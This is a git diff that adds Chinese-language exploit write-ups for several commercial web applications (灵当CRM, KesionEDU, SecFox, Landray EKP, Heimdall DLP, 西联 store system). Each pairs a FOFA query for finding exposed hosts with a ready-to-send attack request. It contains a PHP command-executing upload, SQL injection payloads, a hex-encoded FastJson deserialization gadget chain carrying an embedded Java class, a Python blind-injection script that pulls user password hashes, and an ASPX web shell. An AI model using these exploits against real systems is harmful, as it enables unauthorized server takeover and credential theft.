+灵当CRM系统接口uploadfile文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+POST /crm/weixinmp/index.php?userid=123&module=Upload&usid=1&action=uploadfile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+file_info={"name":"1.php"}&<?php system("whoami");unlink(__FILE__);?>
+```
+
+![image-20241227212839673](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272128744.png)
+
+文件路径
+
+```
+/crm/storage/2024/December/week4/回显文件名.php
+```
+
diff --git a/科汛/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md b/科汛/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md
new file mode 100644
index 0000000..d03786a
--- /dev/null
+++ b/科汛/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 科汛新职教网校系统CheckOrder存在SQL注入漏洞
+
+科汛新职教网校系统KesionEDU CheckOrder 接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="/KS_Inc/static/edu"
+```
+
+## poc
+```javascript
+POST /webapi/APP/CheckOrder HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: application/json, text/javascript, */*; q=0.01
+Priority: u=0
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+
+{"orderid":"1' AND 7755 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7755=7755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))-- Ahbw","apptoken":"1","ordertype":"1"}
+```
+
+![image-20241227223044294](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272230369.png)
\ No newline at end of file
diff --git a/网神/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md b/网神/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md
new file mode 100644
index 0000000..af5282e
--- /dev/null
+++ b/网神/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md
@@ -0,0 +1,33 @@
+# 网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞
+
+网神SecFox运维安全管理与审计系统 authService接口处使用存在漏洞 fastjson 组件，未授权的攻击者可通过fastjson 序列化漏洞对系统发起攻击获取服务器权限。
+
+## fofa
+```javascript
+body="./static/js/vendor.022b3d3adf3423f31f54.js"
+```
+
+## poc
+```javascript
+POST /3.0/authService/login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
+Cmd: id
+Content-Type: application/json;charset=utf-8
+Referer: https://
+Accept-Encoding: gzip
+Connection: close
+
+{
+    "a": {
+        "@type": "java.lang.Class", 
+        "val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
+    }, 
+    "b": {
+        "@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource", 
+        "userOverridesAsString": "HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200206a617661782e7363726970742e536372697074456e67696e654d616e61676572000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000b6e6577496e7374616e6365757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007371007e00137571007e0018000000017400026a7374000f676574456e67696e6542794e616d657571007e001b00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00180000000174202b747279207b0a20206c6f616428226e6173686f726e3a6d6f7a696c6c615f636f6d7061742e6a7322293b0a7d20636174636820286529207b7d0a66756e6374696f6e20676574556e7361666528297b0a202076617220746865556e736166654d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e556e7361666522292e6765744465636c617265644669656c642827746865556e7361666527293b0a2020746865556e736166654d6574686f642e73657441636365737369626c652874727565293b200a202072657475726e20746865556e736166654d6574686f642e676574286e756c6c293b0a7d0a66756e6374696f6e2072656d6f7665436c617373436163686528636c617a7a297b0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617a7a416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c61737328636c617a7a2c6a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c61737322292e6765745265736f75726365417353747265616d2822436c6173732e636c61737322292e72656164416c6c427974657328292c6e756c6c293b0a2020766172207265666c656374696f6e446174614669656c64203d20636c617a7a416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428227265666c656374696f6e4461746122293b0a2020756e736166652e7075744f626a65637428636c617a7a2c756e736166652e6f626a6563744669656c644f6666736574287265666c656374696f6e446174614669656c64292c6e756c6c293b0a7d0a66756e6374696f6e206279706173735265666c656374696f6e46696c7465722829207b0a2020766172207265666c656374696f6e436c6173733b0a2020747279207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a646b2e696e7465726e616c2e7265666c6563742e5265666c656374696f6e22293b0a20207d20636174636820286572726f7229207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e7265666c6563742e5265666c656374696f6e22293b0a20207d0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617373427566666572203d207265666c656374696f6e436c6173732e6765745265736f75726365417353747265616d28225265666c656374696f6e2e636c61737322292e72656164416c6c427974657328293b0a2020766172207265666c656374696f6e416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c617373287265666c656374696f6e436c6173732c20636c6173734275666665722c206e756c6c293b0a2020766172206669656c6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226669656c6446696c7465724d617022293b0a2020766172206d6574686f6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226d6574686f6446696c7465724d617022293b0a2020696620286669656c6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286669656c6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a2020696620286d6574686f6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286d6574686f6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a202072656d6f7665436c6173734361636865286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173732229293b0a7d0a66756e6374696f6e2073657441636365737369626c652861636365737369626c654f626a656374297b0a2020202076617220756e73616665203d20676574556e7361666528293b0a20202020766172206f766572726964654669656c64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e7265666c6563742e41636365737369626c654f626a65637422292e6765744465636c617265644669656c6428226f7665727269646522293b0a20202020766172206f6666736574203d20756e736166652e6f626a6563744669656c644f6666736574286f766572726964654669656c64293b0a20202020756e736166652e707574426f6f6c65616e2861636365737369626c654f626a6563742c206f66667365742c2074727565293b0a7d0a66756e6374696f6e20646566696e65436c617373286279746573297b0a202076617220636c7a203d206e756c6c3b0a20207661722076657273696f6e203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226a6176612e76657273696f6e22293b0a202076617220756e73616665203d20676574556e7361666528290a202076617220636c6173734c6f61646572203d206e6577206a6176612e6e65742e55524c436c6173734c6f61646572286a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6e65742e55524c22292c203029293b0a20207472797b0a202020206966202876657273696f6e2e73706c697428222e22295b305d203e3d20313129207b0a2020202020206279706173735265666c656374696f6e46696c74657228293b0a20202020646566696e65436c6173734d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173734c6f6164657222292e6765744465636c617265644d6574686f642822646566696e65436c617373222c206a6176612e6c616e672e436c6173732e666f724e616d6528225b4222292c6a6176612e6c616e672e496e74656765722e545950452c206a6176612e6c616e672e496e74656765722e54595045293b0a2020202073657441636365737369626c6528646566696e65436c6173734d6574686f64293b0a202020202f2f20e7bb95e8bf872073657441636365737369626c65200a20202020636c7a203d20646566696e65436c6173734d6574686f642e696e766f6b6528636c6173734c6f616465722c2062797465732c20302c2062797465732e6c656e677468293b0a202020207d656c73657b0a2020202020207661722070726f74656374696f6e446f6d61696e203d206e6577206a6176612e73656375726974792e50726f74656374696f6e446f6d61696e286e6577206a6176612e73656375726974792e436f6465536f75726365286e756c6c2c206a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e73656375726974792e636572742e436572746966696361746522292c203029292c206e756c6c2c20636c6173734c6f616465722c205b5d293b0a202020202020636c7a203d20756e736166652e646566696e65436c617373286e756c6c2c2062797465732c20302c2062797465732e6c656e6774682c20636c6173734c6f616465722c2070726f74656374696f6e446f6d61696e293b0a202020207d0a20207d6361746368286572726f72297b0a202020206572726f722e7072696e74537461636b547261636528293b0a20207d66696e616c6c797b0a2020202072657475726e20636c7a3b0a20207d0a7d0a66756e6374696f6e206261736536344465636f6465546f427974652873747229207b0a20207661722062743b0a20207472797b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e4241534536344465636f64657222292e6e6577496e7374616e636528292e6465636f646542756666657228737472293b0a20207d63617463682865297b7d0a2020696620286274203d3d206e756c6c297b0a202020207472797b0a2020202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e42617365363422292e6e6577496e7374616e636528292e6765744465636f64657228292e6465636f646528737472293b0a202020207d63617463682865297b7d0a20207d0a2020696620286274203d3d206e756c6c297b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226f72672e6170616368652e636f6d6d6f6e732e636f6465632e62696e6172792e42617365363422292e6e6577496e7374616e636528292e6465636f646528737472290a20207d0a202072657475726e2062743b0a7d0a76617220636f64653d2279763636766741414144494177516f41435142524367425341464d4b414649415641674156516f4156674258434142594277425a4367414841466f484146734b41467741585167415867674158776741594167415951674159676f414277426a4341426b4341426c4277426d43674263414763494147674b4144304161516f41435142714341427243414273434142744341427543674154414738494148414b4148454163676f414577427a43674154414851494148554b41424d4164676741647767416541634165516f414a5142524367416c41486f494148734b414355416641674166516741666767416677674167416f41675143434367434241494d484149514b4149554168676f414d414348434143494367417741496b4b4144414169676f414d41434c436743464149774b414955416a5163416a676f414f5142384341435043674139414a4148414a454241415938615735706444344241414d6f4b565942414152446232526c4151415054476c755a55353162574a6c636c5268596d786c4151414c614746755a464a6c6358566c633351424141704665474e6c634852706232357a415141455a58686c597745414a69684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576624746755a79395464484a70626d63374151414e553352685932744e5958425559574a735a5163415a6763416b6763416b77634168416341655163416a6763416c4145414344786a62476c756158512b4151414b55323931636d4e6c526d6c735a51454143464e464d53357159585a684441412b41443848414a554d414a59416c7777416d41435a4151413862334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4a6c6358566c63335244623235305a586830534739735a4756794277436144414362414a77424142526e5a5852535a5846315a584e3051585230636d6c696458526c6377454144327068646d4576624746755a7939446247467a637777416e51436541514151616d4632595339735957356e4c303969616d566a644163416e7777416f4143684151424162334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4e6c636e5a735a5852535a5846315a584e3051585230636d6c696458526c637745414332646c64464a6c63334276626e4e6c4151414b5a325630556d56786457567a6441454148577068646d46344c6e4e6c636e5a735a58517555325679646d786c64464a6c63334276626e4e6c4151414a5a32563056334a706447567944414369414a34424143567159585a686543357a5a584a32624756304c6d6830644841755348523063464e6c636e5a735a5852535a5846315a584e304151414a5a325630534756685a47567941514151616d4632595339735957356e4c314e30636d6c755a7777416f77436b415141445932316b444142454145554d414b5541706745414233427961573530624734424141566d6248567a6141454142574e7362334e6c415141414441436e414b674241416476637935755957316c42774370444143714145554d414b734172417741725143734151414464326c7544414375414b3842414152776157356e415141434c5734424142647159585a684c327868626d6376553352796157356e516e56706247526c636777417341437841514146494331754944514d414c4941724145414169396a41514146494331304944514241414a7a614145414169316a4277437a44414330414c554d414551417467454145577068646d4576645852706243395459324675626d56794277435344414333414c674d4144344175514541416c786844414336414c734d414c774176517741766743734441432f414c674d414d41415077454145327068646d4576624746755a79394665474e6c63485270623234424142426a623231745957356b494735766443427564577873444142434144384241414e54525445424142467159585a684c327868626d637655484a765932567a637745414531744d616d4632595339735957356e4c314e30636d6c755a7a734241424e7159585a684c327868626d63765647687962336468596d786c41514151616d4632595339735957356e4c31526f636d56685a41454144574e31636e4a6c626e525561484a6c595751424142516f4b55787159585a684c327868626d6376564768795a57466b4f7745414657646c64454e76626e526c654852446247467a633078765957526c636745414753677054477068646d4576624746755a7939446247467a633078765957526c636a73424142567159585a684c327868626d63765132786863334e4d6232466b5a58494241416c736232466b5132786863334d424143556f54477068646d4576624746755a79395464484a70626d63374b55787159585a684c327868626d63765132786863334d374151414a5a325630545756306147396b415142414b45787159585a684c327868626d6376553352796157356e4f31744d616d4632595339735957356e4c304e7359584e7a4f796c4d616d4632595339735957356e4c334a6c5a6d786c59335176545756306147396b4f77454147477068646d4576624746755a7939795a575a735a574e304c30316c644768765a414541426d6c75646d39725a5145414f53684d616d4632595339735957356e4c303969616d566a6444746254477068646d4576624746755a793950596d706c593351374b55787159585a684c327868626d637654324a715a574e304f7745414557646c6445526c59327868636d566b545756306147396b4151414e6332563051574e6a5a584e7a61574a735a514541424368614b5659424141686e5a5852446247467a637745414579677054477068646d4576624746755a7939446247467a637a734241415a6c6358566862484d424142556f54477068646d4576624746755a793950596d706c593351374b566f424142427159585a684c327868626d637655336c7a644756744151414c5a32563055484a766347567964486b424141743062307876643256795132467a5a5145414643677054477068646d4576624746755a79395464484a70626d63374151414564484a706251454143474e76626e52686157357a415141624b45787159585a684c327868626d637651326868636c4e6c6358566c626d4e6c4f796c6141514147595842775a57356b415141744b45787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c314e30636d6c755a304a316157786b5a584937415141496447395464484a70626d63424142467159585a684c327868626d6376556e567564476c745a514541436d646c64464a31626e5270625755424142556f4b55787159585a684c327868626d6376556e567564476c745a5473424143676f5730787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c31427962324e6c63334d374151414f5a325630535735776458525464484a6c595730424142636f4b55787159585a684c326c764c306c7563485630553352795a5746744f7745414743684d616d4632595339706279394a626e423164464e30636d566862547370566745414448567a5a55526c62476c746158526c636745414a79684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576645852706243395459324675626d56794f774541423268686330356c6548514241414d6f4b566f42414152755a5868304151414f5a32563052584a7962334a5464484a6c595730424141646b5a584e30636d3935414345415051414a4141414141414145414145415067412f4141454151414141414230414151414241414141425371334141477841414141415142424141414142674142414141414541414a41454941507741434145414141414679414159414377414141524b3441414b3241414d53424c594142557371456759447651414874674149544373424137304143625941436b323441414b3241414d53433759414255737145677744765141487467414954436f5344514f39414165324141684f4b7977447651414a7467414b4f6751744c414f3941416d3241416f3642626741417259414178494f746741464567384476514148746741514f67613441414b3241414d534562594142524953424c304142316b4445684e54746741514f67635a427753324142515a426753324142515a42686b454137304143625941436a6f494751635a4251533941416c5a417849565537594143734141457a6f4a47516d344142593643686b4974674158456867457651414857514d5345314f324142415a4341533941416c5a41786b4b55375941436c635a434c59414678495a413730414237594145426b494137304143625941436c635a434c594146784961413730414237594145426b494137304143625941436c657841414141415142424141414154674154414141414577414d41425141467741564143454146674174414263414f41415941454d414751424f41426f4157514162414738414841434b414230416b414165414a59414877436a4143414175414168414c38414967446841434d412b51416b415245414a514244414141414241414241446b41435142454145554141514241414141436e41414541416741414145324b7359424d6849624b725941484a6f424b5249647541416574674166544371324143424c41553042546973534962594149706b4150796f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456969324143653241436c4c4272304145316b4445685654575151534b6c4e5a425370545471634150436f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456975324143653241436c4c4272304145316b4445697854575151534c564e5a42537054547267414c6932324143394e757741775753793241444733414449534d3759414e446f45475153324144575a4141735a424c59414e716341425249624f6757374144425a4c4c59414e3763414d68497a746741304f6753374143565a7477416d475157324143635a424c59414e5a6b4143786b457467413270774146456875324143653241436b3642526b464f675973786741484c4c59414f426b4773446f454751533241446f3642537a474141637374674134475157774f676373786741484c4c59414f426b487678493773414145414a30424277455341446b416e5145484153594141414553415273424a674141415359424b41456d41414141416742424141414165674165414141414b41414e41436b4146674171414273414b7741644143774148774174414367414c6741364143384154674178414751414d7742324144514169674132414a30414f51436c41446f4174774137414d734150414464414430424177412b415163415167454c41454d424477412b41524941507745554145414247774243415238415177456a414541424a6742434153774151774577414555424d77424841455941414143304141372b41453448414563484145674841456b564a524c3841436b4841457042427742482f7741764141594841456348414563484145674841456b4841456f484145634141516341532f3841415141474277424842774248427742494277424a4277424b4277424841414948414573484145663841424d484145662f4141494142416341527763415277634153416341535141424277424d2f5141514277424d427742482f7741434141514841456348414563484145674841456b414151634154663841435141494277424842774248427742494277424a414141414277424e4141442f414149414151634152774141414167415467412f4141454151414141414430414151414241414141434c6741504b6341424575784141454141414144414159414f514143414545414141414f41414d414141414d41414d4144514148414134415267414141416341416b59484145774141414541547741414141494155413d3d223b0a636c7a203d20646566696e65436c617373286261736536344465636f6465546f4279746528636f646529293b0a636c7a2e6e6577496e7374616e636528293b7400046576616c7571007e001b0000000171007e0023737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878;"
+    }
+}
+```
+
+![image-20241227221404049](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272214131.png)
\ No newline at end of file
diff --git a/蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md b/蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md
new file mode 100644
index 0000000..dde9a1f
--- /dev/null
+++ b/蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md
@@ -0,0 +1,166 @@
+# 蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞
+
+蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+app="Landray-OA系统"
+```
+
+## poc
+
+访问save方法，填充一下数据库
+
+```javascript
+POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 76
+
+method=saveICare&fdId=&fdNum=1&docSubject=1&fdName=1&createTime=1&fdStatus=1
+```
+
+```javascript
+POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 60
+
+method=getICareByFdId&fdNum=asdasd'+or+'1'='1&ordertype=down
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240962.png)
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240942.png)
+
+
+
+## Python脚本
+
+```python
+import argparse
+
+import requests
+
+header = {
+    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
+}
+
+
+def exploit_user(url,db_user):
+    global header
+    user_name = ""
+    for i in range(1, 20):
+        low = 1
+        top = 255
+        mid = (low + top) // 2
+        while low < top:
+            send_data = {
+                "method": "getICareByFdId",
+                "ordertype": "down",
+                "fdNum": "aNsSl' or ascii(substring((user_name()),{},1)) < {} and '1'='1".format(
+                    i, mid)
+            }
+            res = requests.post(url, data=send_data, headers=header)
+            if "docSubject" in res.text:
+                top = mid
+            else:
+                low = mid + 1
+            mid = (top + low) // 2
+        if mid <= 1 or mid >= 254:
+            break
+        user_name = user_name + chr(mid - 1)
+        print("[+]user_name:{}".format(user_name))
+        print("\033[F", end="")
+    print("[+]user_name:{}".format(user_name))
+def exploit(url,username):
+    global header
+    password_len = 32
+    password = ""
+    for i in range(1,password_len+1):
+        low = 1
+        top = 255
+        mid = (low + top) // 2
+        while low < top:
+            send_data = {
+                "method": "getICareByFdId",
+                "ordertype": "down",
+                "fdNum": "aNsSl' or ascii(substring((select fdPassword from com.landray.kmss.sys.organization.model.SysOrgPerson where fdLoginName='{}'),{},1)) < {} and '1'='1".format(
+                    username,i, mid)
+            }
+            res = requests.post(url,data=send_data,headers=header)
+            if "docSubject" in res.text:
+                top = mid
+            else:
+                low = mid + 1
+            mid = (top + low) // 2
+        password = password + chr(mid-1)
+        print("[+]password:{}".format(password))
+        print("\033[F",end="")
+    print("[+]password:{}".format(password))
+
+def scan_vuln(url,username,db_user):
+    global header
+    req_url = url.strip("/") + "/fssc/common/fssc_common_portlet/fsscCommonPortlet.do"
+
+    step_data = {
+        "method":"saveICare",
+        "fdId:"","
+        "fdNum":"1",
+        "docSubject":"1",
+        "fdName":"test",
+        "createTime":"1",
+        "fdStatus":"1"
+    }
+    try:
+        req1 = requests.post(req_url,data=step_data,headers=header)
+        if req1.status_code == 200 and "result" in req1.text:
+            print("[+]Vuln exist，start inject password:")
+            if db_user == "check":
+                exploit_user(req_url,db_user)
+            else:
+                exploit(req_url,username)
+        else:
+            print("[-]Vuln not exist.")
+            exit(0)
+    except:
+        print("[-]request error.")
+        exit(0)
+        pass
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Process command line arguments")
+    parser.add_argument('-u', '--url', required=True, help='Target URL')
+    parser.add_argument('-db_user', '--db_user', required=False, help='db_user')
+    parser.add_argument('-U', '--username', required=False, help='Username argument')
+
+    args = parser.parse_args()
+
+    url = args.url
+    db_user = args.db_user
+    username = args.username
+    scan_vuln(url, username, db_user)
+
+
+if __name__ == '__main__':
+    main()
+```
+
+## 漏洞来源
+
+- https://xz.aliyun.com/t/16103?time__1311=GuD%3D7KiK0KYIx05DK7qCuxWuEoT6PGC4E8eD
\ No newline at end of file
diff --git a/虹安/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md b/虹安/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md
new file mode 100644
index 0000000..acb8e22
--- /dev/null
+++ b/虹安/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞
+
+虹安Heimdall DLP数据泄漏防护系统 pushSetup.do 接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="userReg/initUserReg.do"
+```
+
+## poc
+```javascript
+POST /dlp/userReg/pushSetup.do HTTP/1.1
+Host: 
+Priority: u=4
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+setupName={{urlescape(1' AND (SELECT 6789 FROM (SELECT(SLEEP(5)))nxdq) AND 'vpUG'='vpUG)}}
+```
+
+![image-20241227223225696](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272232761.png)
\ No newline at end of file
diff --git a/西联软件/西联软件移动门店管理系统treamToFile文件上传漏洞.md b/西联软件/西联软件移动门店管理系统treamToFile文件上传漏洞.md
new file mode 100644
index 0000000..71359c4
--- /dev/null
+++ b/西联软件/西联软件移动门店管理系统treamToFile文件上传漏洞.md
@@ -0,0 +1,59 @@
+# 西联软件移动门店管理系统treamToFile文件上传漏洞
+
+西联软件-移动门店管理系统 StreamToFile 接口存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+```javascript
+body="西联软件提供云计算服务"
+```
+
+## poc
+```javascript
+POST /api/UploadDB/StreamToFile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Accept: */*
+Connection: close
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="organ"
+
+qwert
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="devid"
+
+yuiop
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="files";filename="1.aspx"
+Content-Type: image/png
+
+<%@ Page Language="Jscript" validateRequest="false" %>
+<%
+var c=new System.Diagnostics.ProcessStartInfo("cmd");
+var e=new System.Diagnostics.Process();
+var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+c.UseShellExecute=false;
+c.RedirectStandardOutput=true;
+c.RedirectStandardError=true;
+e.StartInfo=c;
+c.Arguments="/c " + Request.Item["cmd"];
+e.Start();
+out=e.StandardOutput;
+EI=e.StandardError;
+e.Close();
+Response.Write(out.ReadToEnd() + EI.ReadToEnd());
+System.IO.File.Delete(Request.PhysicalPath);
